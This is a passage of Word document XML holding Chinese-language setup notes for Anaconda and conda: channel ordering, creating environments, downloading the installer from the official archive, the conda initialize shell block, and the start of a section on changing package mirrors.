        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>conda-forge</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>频道在正确的顺序中。将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>conda-forge</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>放在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>defaults</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之前可能会导致包冲突。你可以使用以下命令来查看和更新频道顺序：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27518566" w14:textId="77777777" w:rsidR="007A1107" w:rsidRDefault="007A1107" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D7767AD" w14:textId="77777777" w:rsidR="007A1107" w:rsidRDefault="007A1107" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>lua</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D15EF1" w14:textId="77777777" w:rsidR="007A1107" w:rsidRDefault="007A1107" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43343092" w14:textId="77777777" w:rsidR="007A1107" w:rsidRDefault="007A1107" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>conda config --show channels</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443835E5" w14:textId="77777777" w:rsidR="007A1107" w:rsidRDefault="007A1107" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>conda config --add channels conda-forge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B785866" w14:textId="77777777" w:rsidR="007A1107" w:rsidRDefault="007A1107" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>conda config --add channels defaults</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E42277" w14:textId="77777777" w:rsidR="007A1107" w:rsidRDefault="007A1107" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="550AE7CD" w14:textId="77777777" w:rsidR="007A1107" w:rsidRDefault="007A1107" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在创建新环境时尽量指定所需包的版本。这有助于避免不兼容的包版本。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6B82A2" w14:textId="77777777" w:rsidR="007A1107" w:rsidRDefault="007A1107" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D7F4E8E" w14:textId="77777777" w:rsidR="007A1107" w:rsidRDefault="007A1107" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果你仍然遇到问题，请尝试创建一个全新的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Conda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境，然后在其中安装所需的包。这可以防止现有环境中的包冲突影响安装：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F55EED" w14:textId="77777777" w:rsidR="007A1107" w:rsidRDefault="007A1107" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B476C8F" w14:textId="77777777" w:rsidR="007A1107" w:rsidRDefault="007A1107" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>lua</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1C8835" w14:textId="77777777" w:rsidR="007A1107" w:rsidRDefault="007A1107" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07A2466E" w14:textId="77777777" w:rsidR="007A1107" w:rsidRDefault="007A1107" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>conda create -n new_environment_name package_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77749005" w14:textId="77777777" w:rsidR="007A1107" w:rsidRDefault="007A1107" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DC61A82" w14:textId="77777777" w:rsidR="007A1107" w:rsidRDefault="007A1107" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之后，使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>conda activate new_environment_name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>激活新环境。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F3CF75" w14:textId="77777777" w:rsidR="007A1107" w:rsidRDefault="007A1107" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B6A9A5C" w14:textId="77777777" w:rsidR="007A1107" w:rsidRDefault="007A1107" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果问题依然存在，尝试在创建环境时指定特定的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本。例如，要创建一个使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python 3.7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的新环境，可以运行以下命令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B0B9FA" w14:textId="77777777" w:rsidR="007A1107" w:rsidRDefault="007A1107" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DDB7DB7" w14:textId="77777777" w:rsidR="007A1107" w:rsidRDefault="007A1107" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>lua</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1872C3C7" w14:textId="77777777" w:rsidR="007A1107" w:rsidRDefault="007A1107" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69A0F024" w14:textId="05CD6B29" w:rsidR="00DA339B" w:rsidRDefault="007A1107" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>conda create -n new_environment_name python=3.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784BAB20" w14:textId="77777777" w:rsidR="00DA339B" w:rsidRDefault="00DA339B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="773D3D7D" w14:textId="77777777" w:rsidR="00DA339B" w:rsidRDefault="00DA339B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D7AD775" w14:textId="77777777" w:rsidR="002E1CA5" w:rsidRPr="002E1CA5" w:rsidRDefault="002E1CA5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29E1095A" w14:textId="60135597" w:rsidR="00D91C50" w:rsidRDefault="00D91C50" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="249" w:name="_Toc159779709"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:bookmarkEnd w:id="249"/>
    </w:p>
    <w:p w14:paraId="1BE606DE" w14:textId="46B0968B" w:rsidR="009512F2" w:rsidRDefault="009512F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装参考链接：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743A2FEF" w14:textId="6D5F1F80" w:rsidR="00EC0061" w:rsidRDefault="00FE1468" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId77" w:history="1">
        <w:r w:rsidRPr="00934D09">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://blog.csdn.net/aiboom/article/details/127324633</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="55097917" w14:textId="105723A4" w:rsidR="00FE1468" w:rsidRDefault="00FE1468" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28A2D8B1" w14:textId="7AD6708A" w:rsidR="00373569" w:rsidRDefault="00373569" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>官方下载地址：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C4E687" w14:textId="378DFB7A" w:rsidR="00C90989" w:rsidRDefault="00C90989" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C90989">
        <w:t>https://repo.anaconda.com/archive/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172DAEB2" w14:textId="77777777" w:rsidR="00373569" w:rsidRDefault="00373569" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0379CA01" w14:textId="218C3FD2" w:rsidR="00CA7A7A" w:rsidRDefault="00CA7A7A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最新下载地址</w:t>
      </w:r>
      <w:r w:rsidR="00EA7E96">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00EA7E96">
        <w:t>2023.3.1</w:t>
      </w:r>
      <w:r w:rsidR="00EA7E96">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本</w:t>
      </w:r>
      <w:r w:rsidR="00EA7E96">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D592BC7" w14:textId="26599802" w:rsidR="00CA7A7A" w:rsidRDefault="00CA7A7A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">put anaconda.sh </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7A7A">
        <w:t>https://repo.anaconda.com/archive/Anaconda3-2023.03-1-Linux-x86_64.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4415317A" w14:textId="7C17E737" w:rsidR="00067FD3" w:rsidRDefault="00067FD3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B7B789B" w14:textId="2B4997A8" w:rsidR="0033640E" w:rsidRDefault="0033640E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最后要不要用户启动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，选择</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>yes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，然后把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>bashrc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的下面的部分放到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/etc/profile </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F0C201" w14:textId="77777777" w:rsidR="00AA56CF" w:rsidRPr="00AA56CF" w:rsidRDefault="00AA56CF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA56CF">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># &gt;&gt;&gt; conda initialize &gt;&gt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064F81A0" w14:textId="77777777" w:rsidR="00AA56CF" w:rsidRPr="00AA56CF" w:rsidRDefault="00AA56CF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA56CF">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t># !! Contents within this block are managed by 'conda init' !!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332C81C3" w14:textId="77777777" w:rsidR="00AA56CF" w:rsidRPr="00AA56CF" w:rsidRDefault="00AA56CF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA56CF">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>__conda_setup="$('/anaconda/bin/conda' 'shell.bash' 'hook' 2&gt; /dev/null)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7AD6E1" w14:textId="77777777" w:rsidR="00AA56CF" w:rsidRPr="00AA56CF" w:rsidRDefault="00AA56CF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA56CF">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>if [ $? -eq 0 ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9242B0" w14:textId="77777777" w:rsidR="00AA56CF" w:rsidRPr="00AA56CF" w:rsidRDefault="00AA56CF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA56CF">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    eval "$__conda_setup"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121548AF" w14:textId="77777777" w:rsidR="00AA56CF" w:rsidRPr="00AA56CF" w:rsidRDefault="00AA56CF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA56CF">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55922708" w14:textId="77777777" w:rsidR="00AA56CF" w:rsidRPr="00AA56CF" w:rsidRDefault="00AA56CF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA56CF">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    if [ -f "/anaconda/etc/profile.d/conda.sh" ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F0465B" w14:textId="77777777" w:rsidR="00AA56CF" w:rsidRPr="00AA56CF" w:rsidRDefault="00AA56CF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA56CF">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">        . "/anaconda/etc/profile.d/conda.sh"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C7F2D7" w14:textId="77777777" w:rsidR="00AA56CF" w:rsidRPr="00AA56CF" w:rsidRDefault="00AA56CF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA56CF">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBBFD85" w14:textId="77777777" w:rsidR="00AA56CF" w:rsidRPr="00AA56CF" w:rsidRDefault="00AA56CF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA56CF">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">        export PATH="/anaconda/bin:$PATH"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F9A1DE" w14:textId="77777777" w:rsidR="00AA56CF" w:rsidRPr="00AA56CF" w:rsidRDefault="00AA56CF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA56CF">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C3B796" w14:textId="77777777" w:rsidR="00AA56CF" w:rsidRPr="00AA56CF" w:rsidRDefault="00AA56CF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA56CF">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6766CB95" w14:textId="77777777" w:rsidR="00AA56CF" w:rsidRPr="00AA56CF" w:rsidRDefault="00AA56CF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA56CF">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>unset __conda_setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22ACA223" w14:textId="6D9D0804" w:rsidR="0033640E" w:rsidRDefault="00AA56CF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00AA56CF">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># &lt;&lt;&lt; conda initialize &lt;&lt;&lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDA6F2B" w14:textId="018C2DAA" w:rsidR="00D91C50" w:rsidRDefault="00D91C50" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79C07BE4" w14:textId="03CFFFC8" w:rsidR="008B46AE" w:rsidRDefault="0058739F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058739F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>希望</w:t>
      </w:r>
      <w:r w:rsidRPr="0058739F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> conda </w:t>
      </w:r>
      <w:r w:rsidRPr="0058739F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的基础环境在启动时不被激活，请将</w:t>
      </w:r>
      <w:r w:rsidRPr="0058739F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> auto_activate_base </w:t>
      </w:r>
      <w:r w:rsidRPr="0058739F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数设置为</w:t>
      </w:r>
      <w:r w:rsidRPr="0058739F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D943BE0" w14:textId="094ED328" w:rsidR="0058739F" w:rsidRDefault="0058739F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00041385">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>conda config --set auto_activate_base false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29332F05" w14:textId="1AA9FCAB" w:rsidR="00D91C50" w:rsidRDefault="00D91C50" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="064EE06D" w14:textId="0A9FEE58" w:rsidR="00041385" w:rsidRDefault="00041385" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>随后，如果要启动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>conda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的虚拟环境，则</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3487521A" w14:textId="77FFD53D" w:rsidR="00041385" w:rsidRDefault="00041385" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00543591">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>conda activate base</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46982A7E" w14:textId="3D042763" w:rsidR="00041385" w:rsidRDefault="00041385" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>退出虚拟环境则：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6367D88E" w14:textId="5C6BAC30" w:rsidR="00041385" w:rsidRDefault="00041385" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00543591">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00543591">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>onda deactivate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213D8C16" w14:textId="77777777" w:rsidR="00167C14" w:rsidRDefault="00167C14" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5133FD30" w14:textId="77777777" w:rsidR="00167C14" w:rsidRDefault="00167C14" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="250" w:name="_Toc159779710"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>conda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>换源</w:t>
      </w:r>
      <w:bookmarkEnd w:id="250"/>
    </w:p>
    <w:p w14:paraId="5284ED92" w14:textId="77777777" w:rsidR="00167C14" w:rsidRPr="00FB7DAB" w:rsidRDefault="00167C14" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00880733">
        <w:t>https://blog.csdn.net/scl52tg/article/details/120959893</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509AD500" w14:textId="77777777" w:rsidR="00167C14" w:rsidRDefault="00167C14" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EEA4E78" w14:textId="3BEAF5F9" w:rsidR="00167C14" w:rsidRDefault="00167C14" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恢复默认源</w:t>
      </w:r>
      <w:r w:rsidR="00C76539">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="00C76539" w:rsidRPr="00C76539">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>有些镜像站不如官方源，比如</w:t>
      </w:r>
      <w:r w:rsidR="00C76539" w:rsidRPr="00C76539">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>tuna</w:t>
      </w:r>
      <w:r w:rsidR="00C76539" w:rsidRPr="00C76539">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>站点安装</w:t>
      </w:r>
      <w:r w:rsidR="00C76539" w:rsidRPr="00C76539">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>pytorch</w:t>
      </w:r>
      <w:r w:rsidR="00C76539" w:rsidRPr="00C76539">
        <w:rPr>
